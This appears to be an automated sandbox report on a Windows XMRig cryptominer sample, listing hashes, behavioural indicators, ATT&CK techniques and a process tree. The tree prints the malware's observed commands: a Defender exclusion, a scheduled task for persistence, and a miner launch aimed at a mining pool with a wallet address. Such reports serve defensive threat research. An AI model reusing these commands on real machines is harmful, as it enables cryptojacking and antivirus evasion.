xmrig | 6ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7

Analysis

max time kernel
47s
max time network
52s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 10:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.4MB
MD5

fd9a773f17376e3485292aa261e379ac
SHA1

c0e2bb23e43e2cff1ca052477b7e3f89458b9d50
SHA256

6ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7
SHA512

148da5fcd9c9d194466c3d1489cc71987d57905d6d1635a435e2ddcbf1cf851bdd02c0684a06cec46d44308044bf304ba0f6c789fd82d4cb9c4fff0b1ee91630
SSDEEP

24576:GiCj1Tnwpevq7BZlrkY/wP91wSRXZZAvnn3huG:GR1Twpevq7HJkY4nwSRXIPn7

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/892-140-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/892-142-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/892-144-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/892-145-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/892-160-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

OWT.exe

pid process

240 OWT.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

992 cmd.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

OWT.exe

description pid process target process

PID 240 set thread context of 892 240 OWT.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1556 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1940 timeout.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exeOWT.exe

pid process

676 powershell.exe
1772 powershell.exe
240 OWT.exe
240 OWT.exe

pid	process
240	OWT.exe

pid	process
992	cmd.exe

description	pid	process	target process
PID 240 set thread context of 892	240	OWT.exe	vbc.exe

pid	process
1556	schtasks.exe

pid	process
1940	timeout.exe

pid	process
676	powershell.exe
1772	powershell.exe
240	OWT.exe
240	OWT.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	1544	file.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	240	OWT.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeLockMemoryPrivilege	892	vbc.exe
Token: SeLockMemoryPrivilege	892	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

892 vbc.exe

pid	process
892	vbc.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

file.execmd.exeOWT.execmd.exe

description	pid	process	target process
PID 1544 wrote to memory of 676	1544	file.exe	powershell.exe
PID 1544 wrote to memory of 676	1544	file.exe	powershell.exe
PID 1544 wrote to memory of 676	1544	file.exe	powershell.exe
PID 1544 wrote to memory of 992	1544	file.exe	cmd.exe
PID 1544 wrote to memory of 992	1544	file.exe	cmd.exe
PID 1544 wrote to memory of 992	1544	file.exe	cmd.exe
PID 992 wrote to memory of 1940	992	cmd.exe	timeout.exe
PID 992 wrote to memory of 1940	992	cmd.exe	timeout.exe
PID 992 wrote to memory of 1940	992	cmd.exe	timeout.exe
PID 992 wrote to memory of 240	992	cmd.exe	OWT.exe
PID 992 wrote to memory of 240	992	cmd.exe	OWT.exe
PID 992 wrote to memory of 240	992	cmd.exe	OWT.exe
PID 240 wrote to memory of 1772	240	OWT.exe	powershell.exe
PID 240 wrote to memory of 1772	240	OWT.exe	powershell.exe
PID 240 wrote to memory of 1772	240	OWT.exe	powershell.exe
PID 240 wrote to memory of 908	240	OWT.exe	cmd.exe
PID 240 wrote to memory of 908	240	OWT.exe	cmd.exe
PID 240 wrote to memory of 908	240	OWT.exe	cmd.exe
PID 908 wrote to memory of 1556	908	cmd.exe	schtasks.exe
PID 908 wrote to memory of 1556	908	cmd.exe	schtasks.exe
PID 908 wrote to memory of 1556	908	cmd.exe	schtasks.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe
PID 240 wrote to memory of 892	240	OWT.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3A05.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:1940

C:\ProgramData\winrar\OWT.exe
"C:\ProgramData\winrar\OWT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:908

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
5⤵
- Creates scheduled task(s)
PID:1556

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:892

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
fd9a773f17376e3485292aa261e379ac

SHA1
c0e2bb23e43e2cff1ca052477b7e3f89458b9d50

SHA256
6ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7

SHA512
148da5fcd9c9d194466c3d1489cc71987d57905d6d1635a435e2ddcbf1cf851bdd02c0684a06cec46d44308044bf304ba0f6c789fd82d4cb9c4fff0b1ee91630

Download Submit
C:\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
fd9a773f17376e3485292aa261e379ac

SHA1
c0e2bb23e43e2cff1ca052477b7e3f89458b9d50

SHA256
6ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7

SHA512
148da5fcd9c9d194466c3d1489cc71987d57905d6d1635a435e2ddcbf1cf851bdd02c0684a06cec46d44308044bf304ba0f6c789fd82d4cb9c4fff0b1ee91630

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3A05.tmp.bat

Filesize
138B

MD5
5e2f84c26798ba68c86c65cc813ff327

SHA1
02dbcec8a3cad1fb2669d3a742189e056356330a

SHA256
0e9144f538949853402b0e234490e5377f845fc0a2752e8410381edb08cea16a

SHA512
a183cee16758c7bb45a3d84b0a2fab3d61ae3c99d5da260741d25d8575b508b2830d8eebf8cb2add74b348f218c6de4221749232cc301db187c3f481239b5507

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1fa62ba05737078b0cee08a8c996b7fb

SHA1
0cba1d51e7a9130aca67bd336c20d439b172510f

SHA256
bf2e8079fcec8b91f0f7289e8bfa0c26e4850e8a2afd2045b887e6bbafd33696

SHA512
203f9690d5c0a65436ff3ca3bd5674dc034ccf3287ae01353b8ea590a3137279d94f81940d12bfbd36acd9ba4b71f57122527a223696ee3e8b0837d7caf04133

Download Submit
\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
fd9a773f17376e3485292aa261e379ac

SHA1
c0e2bb23e43e2cff1ca052477b7e3f89458b9d50

SHA256
6ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7

SHA512
148da5fcd9c9d194466c3d1489cc71987d57905d6d1635a435e2ddcbf1cf851bdd02c0684a06cec46d44308044bf304ba0f6c789fd82d4cb9c4fff0b1ee91630

Download Submit
memory/240-124-0x000007FEFCA80000-0x000007FEFCAA2000-memory.dmp

Filesize
136KB

Download
memory/240-97-0x000007FEFD400000-0x000007FEFD46C000-memory.dmp

Filesize
432KB

Download
memory/240-161-0x0000000000F20000-0x00000000010E8000-memory.dmp

Filesize
1.8MB

Download
memory/240-150-0x0000000000F20000-0x00000000010E8000-memory.dmp

Filesize
1.8MB

Download
memory/240-134-0x000007FEFC750000-0x000007FEFC7AB000-memory.dmp

Filesize
364KB

Download
memory/240-103-0x000007FEFD9F0000-0x000007FEFDBF3000-memory.dmp

Filesize
2.0MB

Download
memory/240-133-0x000007FEFD490000-0x000007FEFD4C6000-memory.dmp

Filesize
216KB

Download
memory/240-132-0x000007FEFAA00000-0x000007FEFAA27000-memory.dmp

Filesize
156KB

Download
memory/240-131-0x000007FEFCF00000-0x000007FEFCF25000-memory.dmp

Filesize
148KB

Download
memory/240-130-0x000007FEF9500000-0x000007FEF9571000-memory.dmp

Filesize
452KB

Download
memory/240-129-0x000007FEF9450000-0x000007FEF94B4000-memory.dmp

Filesize
400KB

Download
memory/240-128-0x000007FEFE0E0000-0x000007FEFE12D000-memory.dmp

Filesize
308KB

Download
memory/240-127-0x000007FEF1080000-0x000007FEF10E2000-memory.dmp

Filesize
392KB

Download
memory/240-126-0x000007FEF1060000-0x000007FEF107C000-memory.dmp

Filesize
112KB

Download
memory/240-125-0x000007FEFC930000-0x000007FEFC947000-memory.dmp

Filesize
92KB

Download
memory/240-123-0x000007FEFD4D0000-0x000007FEFD4EF000-memory.dmp

Filesize
124KB

Download
memory/240-122-0x000007FEFDC00000-0x000007FEFDCD7000-memory.dmp

Filesize
860KB

Download
memory/240-116-0x000007FEFB710000-0x000007FEFB925000-memory.dmp

Filesize
2.1MB

Download
memory/240-101-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp

Filesize
9.9MB

Download
memory/240-106-0x0000000000F20000-0x00000000010E8000-memory.dmp

Filesize
1.8MB

Download
memory/240-109-0x0000000000F20000-0x00000000010E8000-memory.dmp

Filesize
1.8MB

Download
memory/240-105-0x0000000000F20000-0x00000000010E8000-memory.dmp

Filesize
1.8MB

Download
memory/240-108-0x0000000000610000-0x0000000000651000-memory.dmp

Filesize
260KB

Download
memory/240-107-0x000007FEF6650000-0x000007FEF677C000-memory.dmp

Filesize
1.2MB

Download
memory/240-104-0x000007FEFB930000-0x000007FEFB986000-memory.dmp

Filesize
344KB

Download
memory/240-91-0x000007FEFB030000-0x000007FEFB09F000-memory.dmp

Filesize
444KB

Download
memory/240-99-0x000007FEFAD50000-0x000007FEFAE47000-memory.dmp

Filesize
988KB

Download
memory/240-87-0x0000000000000000-mapping.dmp

Download
memory/240-100-0x000007FEFF520000-0x000007FEFF5FB000-memory.dmp

Filesize
876KB

Download
memory/240-98-0x000007FEFDE60000-0x000007FEFDED1000-memory.dmp

Filesize
452KB

Download
memory/240-102-0x000007FEFE190000-0x000007FEFE2BD000-memory.dmp

Filesize
1.2MB

Download
memory/240-92-0x000007FEFAE50000-0x000007FEFAEEC000-memory.dmp

Filesize
624KB

Download
memory/240-93-0x000007FEFF4B0000-0x000007FEFF517000-memory.dmp

Filesize
412KB

Download
memory/240-96-0x00000000771D0000-0x00000000772EF000-memory.dmp

Filesize
1.1MB

Download
memory/240-95-0x000007FEFE040000-0x000007FEFE0DF000-memory.dmp

Filesize
636KB

Download
memory/240-94-0x00000000770D0000-0x00000000771CA000-memory.dmp

Filesize
1000KB

Download
memory/676-82-0x000007FEF58E0000-0x000007FEF643D000-memory.dmp

Filesize
11.4MB

Download
memory/676-85-0x000000000265B000-0x000000000267A000-memory.dmp

Filesize
124KB

Download
memory/676-74-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp

Filesize
8KB

Download
memory/676-73-0x0000000000000000-mapping.dmp

Download
memory/676-80-0x000007FEED900000-0x000007FEEE323000-memory.dmp

Filesize
10.1MB

Download
memory/676-84-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/676-83-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/892-142-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/892-144-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/892-145-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/892-140-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/892-138-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/892-136-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/892-135-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/892-156-0x0000000140343234-mapping.dmp

Download
memory/892-160-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/908-114-0x0000000000000000-mapping.dmp

Download
memory/992-75-0x0000000000000000-mapping.dmp

Download
memory/1544-60-0x00000000771D0000-0x00000000772EF000-memory.dmp

Filesize
1.1MB

Download
memory/1544-61-0x000007FEFD400000-0x000007FEFD46C000-memory.dmp

Filesize
432KB

Download
memory/1544-62-0x000007FEFDE60000-0x000007FEFDED1000-memory.dmp

Filesize
452KB

Download
memory/1544-58-0x00000000770D0000-0x00000000771CA000-memory.dmp

Filesize
1000KB

Download
memory/1544-77-0x000007FEFD4D0000-0x000007FEFD4EF000-memory.dmp

Filesize
124KB

Download
memory/1544-57-0x000007FEFF4B0000-0x000007FEFF517000-memory.dmp

Filesize
412KB

Download
memory/1544-59-0x000007FEFE040000-0x000007FEFE0DF000-memory.dmp

Filesize
636KB

Download
memory/1544-55-0x000007FEFB0A0000-0x000007FEFB10F000-memory.dmp

Filesize
444KB

Download
memory/1544-63-0x000007FEFADF0000-0x000007FEFAEE7000-memory.dmp

Filesize
988KB

Download
memory/1544-65-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

Filesize
9.9MB

Download
memory/1544-72-0x000007FEF6930000-0x000007FEF6A5C000-memory.dmp

Filesize
1.2MB

Download
memory/1544-71-0x0000000001360000-0x0000000001528000-memory.dmp

Filesize
1.8MB

Download
memory/1544-70-0x000007FEFB930000-0x000007FEFB986000-memory.dmp

Filesize
344KB

Download
memory/1544-69-0x000007FEFD9F0000-0x000007FEFDBF3000-memory.dmp

Filesize
2.0MB

Download
memory/1544-68-0x000007FEFE190000-0x000007FEFE2BD000-memory.dmp

Filesize
1.2MB

Download
memory/1544-67-0x0000000000600000-0x0000000000641000-memory.dmp

Filesize
260KB

Download
memory/1544-66-0x0000000001360000-0x0000000001528000-memory.dmp

Filesize
1.8MB

Download
memory/1544-64-0x000007FEFF520000-0x000007FEFF5FB000-memory.dmp

Filesize
876KB

Download
memory/1544-56-0x000007FEFAEF0000-0x000007FEFAF8C000-memory.dmp

Filesize
624KB

Download
memory/1544-81-0x0000000000600000-0x0000000000641000-memory.dmp

Filesize
260KB

Download
memory/1544-79-0x0000000001360000-0x0000000001528000-memory.dmp

Filesize
1.8MB

Download
memory/1556-117-0x0000000000000000-mapping.dmp

Download
memory/1772-110-0x0000000000000000-mapping.dmp

Download
memory/1772-119-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/1772-120-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/1772-115-0x000007FEECF60000-0x000007FEED983000-memory.dmp

Filesize
10.1MB

Download
memory/1772-118-0x000007FEEC400000-0x000007FEECF5D000-memory.dmp

Filesize
11.4MB

Download
memory/1772-121-0x000000000253B000-0x000000000255A000-memory.dmp

Filesize
124KB

Download
memory/1940-78-0x0000000000000000-mapping.dmp

Download